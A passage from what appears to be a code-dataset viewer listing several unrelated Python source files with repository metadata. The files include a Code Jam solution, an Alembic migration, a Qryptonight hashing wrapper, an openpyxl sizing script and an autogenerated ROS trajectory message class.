break
if abstract in result['_source']['abstract']:
try:
id2date[i]=result['_source']['date']
except:
break
f=open(homedir+"/temp/id2date"+s3key+".json",'w')
json.dump(id2date,f)
f.close()
f=open(homedir+"/temp/id2date"+s3key+".json",'rb')
d=f.read()
f.close()
mybucket.put_object(Body=d,Key="yalun/"+s3key+"/id2date.json") | [
"[email protected]"
]
| |
6f781fbb34a0effb575b1359355f0db2026e382d | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5658571765186560_1/Python/dnutsch/problem_d.py | ec9d645f24bcbab7bf09cb17d6dd1abaea92f717 | []
| no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,111 | py | #!/usr/bin/python
f = open('D-large.in','r');
out = open('D-large.out','w');
T = int(f.readline().strip())
for t in range(T):
X,R,C = [int(x) for x in f.readline().strip().split(' ')]
#print "x {}, r {}, c {}".format(X,R,C)
mx = max(R,C)
mn = min (R,C)
richard_wins = False
if (R*C) % X != 0:
richard_wins = True
if X >=7:
richard_wins = True # can make a donut
elif X > mx:
# maybe win by bisection, assume so
richard_wins = True
elif X == mx:
# maybe can bisect in minor dimension
if X >= 4 and X >= mn + (mn -1):
richard_wins = True
else:
#can't win by bisection, try squaring
if X >= 4 and mn < 2:
richard_wins = True
if X >= 9 and mn < 3:
richard_wins = True
if X >= 16 and mn < 4:
richard_wins = True
max_angle = 1+((X-1) // 2)
if max_angle > mn:
richard_wins = True
line = "Case #{}: {}".format(t+1, "RICHARD" if richard_wins else "GABRIEL")
print line
out.write(line+"\n")
f.close()
out.close()
| [
"[email protected]"
]
| |
b3a796f6f6e1d72469e523177fe6e9c9ac1fb9ff | 94d5ef47d3244950a0308c754e0aa55dca6f2a0e | /migrations/versions/53e2ad0d34e3_added_produce_id_to_breed_table_instead.py | 977835fba4e07675a127bd13b29394f31d921a8f | []
| no_license | MUMT-IT/mis2018 | 9cbc7191cdc1bcd7e0c2de1e0586d8bd7b26002e | 69fabc0b16abfeba44173caa93d4f63fa79033fd | refs/heads/master | 2023-08-31T16:00:51.717449 | 2023-08-31T11:30:13 | 2023-08-31T11:30:13 | 115,810,883 | 5 | 5 | null | 2023-09-14T10:08:35 | 2017-12-30T17:06:00 | HTML | UTF-8 | Python | false | false | 1,288 | py | """added produce_id to breed table instead
Revision ID: 53e2ad0d34e3
Revises: e4f15449eb31
Create Date: 2018-02-03 22:51:38.297350
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '53e2ad0d34e3'
down_revision = 'e4f15449eb31'
branch_labels = None
depends_on = None
def upgrade():
    """Apply: move the produce<->breed link onto the breed table.

    Adds food_produce_breeds.produce_id (FK to food_produces.id) and drops
    the old food_produces.produce_breed_id column and its FK constraint.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('food_produce_breeds', sa.Column('produce_id', sa.Integer(), nullable=True))
    op.create_foreign_key(None, 'food_produce_breeds', 'food_produces', ['produce_id'], ['id'])
    op.drop_constraint(u'food_produces_produce_breed_id_fkey', 'food_produces', type_='foreignkey')
    op.drop_column('food_produces', 'produce_breed_id')
    # ### end Alembic commands ###
def downgrade():
    """Revert: restore food_produces.produce_breed_id (with its FK) and drop
    the food_produce_breeds.produce_id column added by upgrade()."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('food_produces', sa.Column('produce_breed_id', sa.INTEGER(), autoincrement=False, nullable=True))
    op.create_foreign_key(u'food_produces_produce_breed_id_fkey', 'food_produces', 'food_produce_breeds', ['produce_breed_id'], ['id'])
    op.drop_constraint(None, 'food_produce_breeds', type_='foreignkey')
    op.drop_column('food_produce_breeds', 'produce_id')
    # ### end Alembic commands ###
| [
"[email protected]"
]
| |
65b9c52ec1d9f80e900be3aaf4e02cf9ea349b1c | 9775ca99e222ec2cf7aa071b68954ee750f4b58a | /0x09-python-everything_is_object/100-magic_string.py | bc304a2f8dc85450f6f897c63025222c9cd30a42 | []
| no_license | humeinstein/holbertonschool-higher_level_programming | f7363a129cc5e2787207ab898c984b5866cbe7de | 01ba467964d7585ee95b7e0d76e7ae6bbdf61358 | refs/heads/master | 2020-07-22T20:25:21.868028 | 2020-02-13T23:08:49 | 2020-02-13T23:08:49 | 207,317,556 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | #!/usr/bin/python3
def magic_string(new_list=[]):
    """Append "Holberton" to new_list and return the comma-joined result.

    NOTE: the mutable default argument is intentional here — it is the
    classic Python gotcha this exercise demonstrates: successive calls
    without an argument share one list, so the output accumulates one
    "Holberton" per call.
    """
    new_list.append("Holberton")
    return ", ".join(new_list)
"[email protected]"
]
| |
3124b674fa821716127a4d34ee60d1afc948da96 | 7000895fad6f4c23084122ef27b3292d5e57df9f | /src/xrd/crypto/Qryptonight.py | 1475f988d07b1c8d0513eab0742c2dab0685602f | [
"MIT"
]
| permissive | jack3343/xrd-core | 1302cefe2a231895a53fcef73e558cdbc1196884 | 48a6d890d62485c627060b017eadf85602268caf | refs/heads/master | 2022-12-15T07:36:16.618507 | 2020-08-27T09:21:36 | 2020-08-27T09:21:36 | 290,652,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,140 | py | # coding=utf-8
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
import threading
from xrd.core import config
from xrd.core.Singleton import Singleton
from xrd.crypto.Qryptonight7 import Qryptonight7
from xrd.crypto.QRandomX import QRandomX
class Qryptonight(object, metaclass=Singleton):
    """Height-aware PoW hashing facade (singleton).

    Dispatches to Qryptonight7 for blocks below the first hard-fork height
    and to QRandomX from that height on (config.dev.hard_fork_heights[0]).
    """

    def __init__(self):
        self.lock = threading.Lock()  # serializes concurrent hash() calls
        self._qryptonight_7 = Qryptonight7()
        self._qrandom_x = QRandomX()

    def get_qn(self, block_number):
        """Return the hashing backend active at *block_number*."""
        if block_number < config.dev.hard_fork_heights[0]:
            return self._qryptonight_7
        else:
            return self._qrandom_x

    def get_seed_height(self, block_number):
        """Return the RandomX seed height for *block_number* (delegates to QRandomX)."""
        return self._qrandom_x.get_seed_height(block_number)

    def hash(self, block_number, seed_height, seed_hash, blob):
        """Hash *blob* with the algorithm active at *block_number*.

        seed_height and seed_hash are only consumed by the RandomX path.
        Returns the digest as bytes.
        """
        with self.lock:
            if block_number < config.dev.hard_fork_heights[0]:
                return bytes(self._qryptonight_7.hash(blob))
            else:
                return bytes(self._qrandom_x.hash(block_number, seed_height, seed_hash, blob))
| [
"[email protected]"
]
| |
d3407c1815d554881ce33812bf3dfc89430fe36f | 2521e6427a7668d8cc91eabb368a5cf0eb7310f9 | /Cap18-Extras/09_dimensionar.py | 5872547aa4d77143e41c6c59a3c7fd24ab1da260 | []
| no_license | frclasso/turma3_Python1_2018 | 4a7bc0ba0eb538100400c15fc5c5b3ac1eeb7e50 | 47cd3aaa6828458b7f5164a8bce717bb8dd83a7c | refs/heads/master | 2020-04-06T16:18:00.889198 | 2019-06-10T15:11:32 | 2019-06-10T15:11:32 | 157,614,408 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 284 | py | #!/usr/bin/env python3
import openpyxl
wb = openpyxl.Workbook()
#print(wb.sheetnames)
sheet = wb.active
sheet['A1'] = 'Tall row'
sheet['B2'] = 'Wide column'
sheet.row_dimensions[1].height = 70
sheet.column_dimensions['B'].widht = 50
wb.save('dimensions.xlsx')
print('Feito...') | [
"[email protected]"
]
| |
aeb1d9e97840a831a2788c0ea0ccb002728935fd | 2b7d422e78c188923158a2a0780a99eca960e746 | /opt/ros/melodic/lib/python2.7/dist-packages/control_msgs/msg/_JointTrajectoryGoal.py | 5daffbc8743dfc8aad30e794c9f3e0535a86a395 | []
| no_license | sroberti/VREP-Sandbox | 4fd6839cd85ac01aa0f2617b5d6e28440451b913 | 44f7d42494654357b6524aefeb79d7e30599c01d | refs/heads/master | 2022-12-24T14:56:10.155484 | 2019-04-18T15:11:54 | 2019-04-18T15:11:54 | 180,481,713 | 0 | 1 | null | 2022-12-14T18:05:19 | 2019-04-10T02:00:14 | C++ | UTF-8 | Python | false | false | 13,159 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from control_msgs/JointTrajectoryGoal.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import trajectory_msgs.msg
import genpy
import std_msgs.msg
class JointTrajectoryGoal(genpy.Message):
_md5sum = "2a0eff76c870e8595636c2a562ca298e"
_type = "control_msgs/JointTrajectoryGoal"
_has_header = False #flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
trajectory_msgs/JointTrajectory trajectory
================================================================================
MSG: trajectory_msgs/JointTrajectory
Header header
string[] joint_names
JointTrajectoryPoint[] points
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
string frame_id
================================================================================
MSG: trajectory_msgs/JointTrajectoryPoint
# Each trajectory point specifies either positions[, velocities[, accelerations]]
# or positions[, effort] for the trajectory to be executed.
# All specified values are in the same order as the joint names in JointTrajectory.msg
float64[] positions
float64[] velocities
float64[] accelerations
float64[] effort
duration time_from_start
"""
__slots__ = ['trajectory']
_slot_types = ['trajectory_msgs/JointTrajectory']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
trajectory
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(JointTrajectoryGoal, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.trajectory is None:
self.trajectory = trajectory_msgs.msg.JointTrajectory()
else:
self.trajectory = trajectory_msgs.msg.JointTrajectory()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.trajectory.header.seq, _x.trajectory.header.stamp.secs, _x.trajectory.header.stamp.nsecs))
_x = self.trajectory.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.trajectory.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.trajectory.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.trajectory.points)
buff.write(_struct_I.pack(length))
for val1 in self.trajectory.points:
length = len(val1.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.positions))
length = len(val1.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.velocities))
length = len(val1.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.accelerations))
length = len(val1.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.effort))
_v1 = val1.time_from_start
_x = _v1
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.trajectory is None:
self.trajectory = trajectory_msgs.msg.JointTrajectory()
end = 0
_x = self
start = end
end += 12
(_x.trajectory.header.seq, _x.trajectory.header.stamp.secs, _x.trajectory.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.trajectory.header.frame_id = str[start:end].decode('utf-8')
else:
self.trajectory.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.trajectory.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.trajectory.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.trajectory.points = []
for i in range(0, length):
val1 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.positions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.velocities = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.accelerations = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.effort = struct.unpack(pattern, str[start:end])
_v2 = val1.time_from_start
_x = _v2
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.trajectory.points.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.trajectory.header.seq, _x.trajectory.header.stamp.secs, _x.trajectory.header.stamp.nsecs))
_x = self.trajectory.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.trajectory.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.trajectory.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.trajectory.points)
buff.write(_struct_I.pack(length))
for val1 in self.trajectory.points:
length = len(val1.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.positions.tostring())
length = len(val1.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.velocities.tostring())
length = len(val1.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.accelerations.tostring())
length = len(val1.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.effort.tostring())
_v3 = val1.time_from_start
_x = _v3
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.trajectory is None:
self.trajectory = trajectory_msgs.msg.JointTrajectory()
end = 0
_x = self
start = end
end += 12
(_x.trajectory.header.seq, _x.trajectory.header.stamp.secs, _x.trajectory.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.trajectory.header.frame_id = str[start:end].decode('utf-8')
else:
self.trajectory.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.trajectory.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.trajectory.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.trajectory.points = []
for i in range(0, length):
val1 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v4 = val1.time_from_start
_x = _v4
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.trajectory.points.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_2i = None
def _get_struct_2i():
global _struct_2i
if _struct_2i is None:
_struct_2i = struct.Struct("<2i")
return _struct_2i
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.